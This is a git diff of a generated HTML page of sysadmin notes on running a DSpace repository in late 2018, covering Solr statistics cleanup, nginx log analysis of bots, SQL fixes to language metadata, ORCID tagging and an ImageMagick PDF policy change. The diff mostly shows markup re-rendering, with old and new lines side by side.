<li>Which means that, for our statistics core with <em>149 million</em> documents, each entry in our <code>filterCache</code> would use 8.9 GB!</li>
</ul>
<pre><code>((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
<pre tabindex="0"><code>((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
</code></pre><ul>
<li>So I think we can forget about tuning this for now!</li>
<li><a href="http://lucene.472066.n3.nabble.com/Calculating-filterCache-size-td4142526.html">Discussion on the mailing list about <code>filterCache</code> size</a></li>
@ -495,7 +495,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>Trying to figure out how to get item views and downloads from SQLite in a join</li>
<li>It appears SQLite doesn&rsquo;t support <code>FULL OUTER JOIN</code> so some people on StackOverflow have emulated it with <code>LEFT JOIN</code> and <code>UNION</code>:</li>
</ul>
<pre><code>&gt; SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
<pre tabindex="0"><code>&gt; SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
LEFT JOIN itemdownloads downloads USING(id)
UNION ALL
SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemdownloads downloads
@ -505,7 +505,7 @@ WHERE views.id IS NULL;
<li>This &ldquo;works&rdquo; but the resulting rows are kinda messy so I&rsquo;d have to do extra logic in Python</li>
<li>Maybe we can use one &ldquo;items&rdquo; table with defaults values and UPSERT (aka insert&hellip; on conflict &hellip; do update):</li>
</ul>
<pre><code>sqlite&gt; CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
<pre tabindex="0"><code>sqlite&gt; CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
sqlite&gt; INSERT INTO items(id, views) VALUES(0, 52);
sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 171);
sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 176) ON CONFLICT(id) DO UPDATE SET downloads=176;
@ -521,7 +521,7 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
<li>Ok this is hilarious, I manually downloaded the <a href="https://packages.ubuntu.com/cosmic/libsqlite3-0">libsqlite3 3.24.0 deb from Ubuntu 18.10 &ldquo;cosmic&rdquo;</a> and installed it in Ubnutu 16.04 and now the Python <code>indexer.py</code> works</li>
<li>This is definitely a dirty hack, but the list of packages we use that depend on <code>libsqlite3-0</code> in Ubuntu 16.04 are actually pretty few:</li>
</ul>
<pre><code># apt-cache rdepends --installed libsqlite3-0 | sort | uniq
<pre tabindex="0"><code># apt-cache rdepends --installed libsqlite3-0 | sort | uniq
gnupg2
libkrb5-26-heimdal
libnss3
@ -530,10 +530,10 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
</code></pre><ul>
<li>I wonder if I could work around this by detecting the SQLite library version, for example on Ubuntu 16.04 after I replaced the library:</li>
</ul>
<pre><code># python3
<pre tabindex="0"><code># python3
Python 3.5.2 (default, Nov 23 2017, 16:37:01)
[GCC 5.4.0 20160609] on linux
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.
Type &#34;help&#34;, &#34;copyright&#34;, &#34;credits&#34; or &#34;license&#34; for more information.
&gt;&gt;&gt; import sqlite3
&gt;&gt;&gt; print(sqlite3.sqlite_version)
3.24.0
@ -542,7 +542,7 @@ Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;licen
<li>I changed the syntax of the SQLite stuff and PostgreSQL is working flawlessly with psycopg2&hellip; hmmm.</li>
<li>For reference, creating a PostgreSQL database for testing this locally (though <code>indexer.py</code> will create the table):</li>
</ul>
<pre><code>$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
$ createuser -h localhost -U postgres --pwprompt dspacestatistics
$ psql -h localhost -U postgres dspacestatistics
dspacestatistics=&gt; CREATE TABLE IF NOT EXISTS items
@ -558,7 +558,7 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>DSpace Test currently has about 2,000,000 documents with <code>isBot:true</code> in its Solr statistics core, and the size on disk is 2GB (it&rsquo;s not much, but I have to test this somewhere!)</li>
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics+Maintenance">DSpace 5.x Solr documentation</a> I can use <code>dspace stats-util -f</code>, so let&rsquo;s try it:</li>
</ul>
<pre><code>$ dspace stats-util -f
<pre tabindex="0"><code>$ dspace stats-util -f
</code></pre><ul>
<li>The command comes back after a few seconds and I still see 2,000,000 documents in the statistics core with <code>isBot:true</code></li>
<li>I was just writing a message to the dspace-tech mailing list and then I decided to check the number of bot view events on DSpace Test again, and now it&rsquo;s 201 instead of 2,000,000, and statistics core is only 30MB now!</li>
@ -576,11 +576,11 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>According to the <a href="https://support.google.com/webmasters/answer/80553">Googlebot FAQ</a> the domain name in the reverse DNS lookup should contain either <code>googlebot.com</code> or <code>google.com</code></li>
<li>In Solr this appears to be an appropriate query that I can maybe use later (returns 81,000 documents):</li>
</ul>
<pre><code>*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
<pre tabindex="0"><code>*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
</code></pre><ul>
<li>I translate that into a delete command using the <code>/update</code> handler:</li>
</ul>
<pre><code>http://localhost:8081/solr/statistics/update?commit=true&amp;stream.body=&lt;delete&gt;&lt;query&gt;*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false&lt;/query&gt;&lt;/delete&gt;
<pre tabindex="0"><code>http://localhost:8081/solr/statistics/update?commit=true&amp;stream.body=&lt;delete&gt;&lt;query&gt;*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false&lt;/query&gt;&lt;/delete&gt;
</code></pre><ul>
<li>And magically all those 81,000 documents are gone!</li>
<li>After a few hours the Solr statistics core is down to 44GB on CGSpace!</li>
@ -588,7 +588,7 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>Basically, it turns out that using <code>facet.mincount=1</code> is really beneficial for me because it reduces the size of the Solr result set, reduces the amount of data we need to ingest into PostgreSQL, and the API returns HTTP 404 Not Found for items without views or downloads anyways</li>
<li>I deployed the new version on CGSpace and now it looks pretty good!</li>
</ul>
<pre><code>Indexing item views (page 28 of 753)
<pre tabindex="0"><code>Indexing item views (page 28 of 753)
...
Indexing item downloads (page 260 of 260)
</code></pre><ul>
@ -606,12 +606,12 @@ Indexing item downloads (page 260 of 260)
<li>I will have to keep an eye on that over the next few weeks to see if things stay as they are</li>
<li>I did a batch replacement of the access rights with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.status -t correct -m 206
</code></pre><ul>
<li>This changes &ldquo;Open Access&rdquo; to &ldquo;Unrestricted Access&rdquo; and &ldquo;Limited Access&rdquo; to &ldquo;Restricted Access&rdquo;</li>
<li>After that I did a full Discovery reindex:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 77m3.755s
user 7m39.785s
@ -629,7 +629,7 @@ sys 2m18.485s
<li>Linode emailed to say that CGSpace&rsquo;s (linode19) CPU load was high for a few hours last night</li>
<li>Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;26/Sep/2018:(19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;26/Sep/2018:(19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
295 34.218.226.147
296 66.249.64.95
350 157.55.39.185
@ -645,9 +645,9 @@ sys 2m18.485s
<li><code>68.6.87.12</code> is on Cox Communications in the US (?)</li>
<li>These hosts are not using proper user agents and are not re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-09-26 | sort | uniq
5423
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12&#39; dspace.log.2018-09-26 | sort | uniq
758
</code></pre><ul>
<li>I will add their IPs to the list of bad bots in nginx so we can add a &ldquo;bot&rdquo; user agent to them and let Tomcat&rsquo;s Crawler Session Manager Valve handle them</li>
@ -659,12 +659,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
<li>Peter sent me a list of 43 author names to fix, but it had some encoding errors like <code>Belalcázar, John</code> like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)</li>
<li>I did batch replaces for both on CGSpace with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>Afterwards I started a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Linode sent an alert that both CGSpace and DSpace Test were using high CPU for the last two hours</li>
<li>It seems to be Moayad trying to do the AReS explorer indexing</li>
@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
<li>Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc</li>
<li>I think I should just batch export and update all languages&hellip;</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
</code></pre><ul>
<li>Then I can simply delete the &ldquo;Other&rdquo; and &ldquo;other&rdquo; ones because that&rsquo;s not useful at all:</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Other&#39;;
DELETE 6
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;other&#39;;
DELETE 79
</code></pre><ul>
<li>Looking through the list I see some weird language codes like <code>gh</code>, so I checked out those items:</li>
</ul>
<pre><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
resource_id
-------------
94530
@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
</code></pre><ul>
<li>Those items are from Ghana, so the submitter apparently thought <code>gh</code> was a language&hellip; I can safely delete them:</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
DELETE 2
</code></pre><ul>
<li>The next issue would be <code>jn</code>:</li>
</ul>
<pre><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
resource_id
-------------
94001
@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
<li>Those items are about Japan, so I will update them to be <code>ja</code></li>
<li>Other replacements:</li>
</ul>
<pre><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
UPDATE metadatavalue SET text_value=&#39;fr&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;fn&#39;;
UPDATE metadatavalue SET text_value=&#39;hi&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;in&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Ja&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jp&#39;;
</code></pre><ul>
<li>Then there are 12 items with <code>en|hi</code>, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata</li>
</ul>
@ -748,15 +748,15 @@ UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_f
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -56,12 +56,12 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -107,7 +107,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<p class="blog-post-meta">
<time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<ul>
<li>I see Moayad was busy collecting item views and downloads from CGSpace yesterday:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
933 40.77.167.90
971 95.108.181.88
1043 41.204.190.40
@ -135,18 +135,18 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
</code></pre><ul>
<li>Of those, about 20% were HTTP 500 responses (!):</li>
</ul>
<pre><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | grep 34.218.226.147 | awk &#39;{print $9}&#39; | sort -n | uniq -c
118927 200
31435 500
</code></pre><ul>
<li>I added Phil Thornton and Sonal Henson&rsquo;s ORCID identifiers to the controlled vocabulary for <code>cg.creator.orcid</code> and then re-generated the names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
</code></pre><ul>
<li>I found a new corner case error that I need to check, given <em>and</em> family names deactivated:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
</code></pre><ul>
<li>It appears to be Jim Lorenzen&hellip; I need to check that later!</li>
@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Linode sent another alert about CPU usage on CGSpace (linode18) this evening</li>
<li>It seems that Moayad is making quite a lot of requests today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1594 157.55.39.160
1627 157.55.39.173
1774 136.243.6.84
@ -169,37 +169,37 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>But in super positive news, he says they are using my new <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> and it&rsquo;s MUCH faster than using Atmire CUA&rsquo;s internal &ldquo;restlet&rdquo; API</li>
<li>I don&rsquo;t recognize the <code>138.201.49.199</code> IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:</li>
</ul>
<pre><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /[a-z]+&#39; | sort | uniq -c
8324 GET /bitstream
4193 GET /handle
</code></pre><ul>
<li>Suspiciously, it&rsquo;s only grabbing the CGIAR System Office community (handle prefix 10947):</li>
</ul>
<pre><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /handle/[0-9]{5}&#39; | sort | uniq -c
7 GET /handle/10568
4186 GET /handle/10947
</code></pre><ul>
<li>The user agent is suspicious too:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
</code></pre><ul>
<li>It&rsquo;s clearly a bot and it&rsquo;s not re-using its Tomcat session, so I will add its IP to the nginx bad bot list</li>
<li>I looked in Solr&rsquo;s statistics core and these hits were actually all counted as <code>isBot:false</code> (of course)&hellip; hmmm</li>
<li>I tagged all of Sonal and Phil&rsquo;s items with their ORCID identifiers on CGSpace using my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Where <code>2018-10-03-add-orcids.csv</code> contained:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Henson, Sonal P.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Henson, S.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Thornton, P.K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phil&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip K.&quot;,Philip Thornton: 0000-0002-1854-0182
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Henson, Sonal P.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Henson, S.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Thornton, P.K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phil&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip K.&#34;,Philip Thornton: 0000-0002-1854-0182
</code></pre><h2 id="2018-10-04">2018-10-04</h2>
<ul>
<li>Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)</li>
@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>So it&rsquo;s fixed, but I&rsquo;m not sure why!</li>
<li>Peter wants to know the number of API requests per month, which was about 250,000 in September (exluding statlet requests):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E &#39;Sep/2018&#39; | grep -c -v &#39;statlets&#39;
251226
</code></pre><ul>
<li>I found a logic error in the dspace-statistics-api <code>indexer.py</code> script that was causing item views to be inserted into downloads</li>
@ -242,8 +242,8 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Peter noticed that some recently added PDFs don&rsquo;t have thumbnails</li>
<li>When I tried to force them to be generated I got an error that I&rsquo;ve never seen before:</li>
</ul>
<pre><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
<pre tabindex="0"><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf&#39; @ error/constitute.c/ReadImage/412.
</code></pre><ul>
<li>I see there was an update to Ubuntu&rsquo;s ImageMagick on 2018-10-05, so maybe something changed or broke?</li>
<li>I get the same error when forcing <code>filter-media</code> to run on DSpace Test too, so it&rsquo;s gotta be an ImageMagic bug</li>
@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>Wow, someone on <a href="https://twitter.com/rosscampbell/status/1048268966819319808">Twitter posted about this breaking his web application</a> (and it was retweeted by the ImageMagick acount!)</li>
<li>I commented out the line that disables PDF thumbnails in <code>/etc/ImageMagick-6/policy.xml</code>:</li>
</ul>
<pre><code> &lt;!--&lt;policy domain=&quot;coder&quot; rights=&quot;none&quot; pattern=&quot;PDF&quot; /&gt;--&gt;
